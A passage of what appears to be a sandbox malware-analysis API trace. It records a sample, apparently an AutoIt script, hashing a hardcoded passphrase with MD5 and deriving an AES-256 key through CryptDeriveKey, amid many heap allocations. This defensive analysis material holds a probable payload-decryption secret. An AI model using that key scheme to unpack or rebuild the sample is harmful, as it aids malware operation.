lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca6d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0076.742] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0076.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.743] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0076.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.743] CryptHashData (hHash=0x41ac700, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0076.744] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0076.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0076.745] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0076.746] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0076.746] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca6e8 [0076.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca6e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.748] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac000) returned 1 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0076.751] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0076.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0076.756] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0076.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, 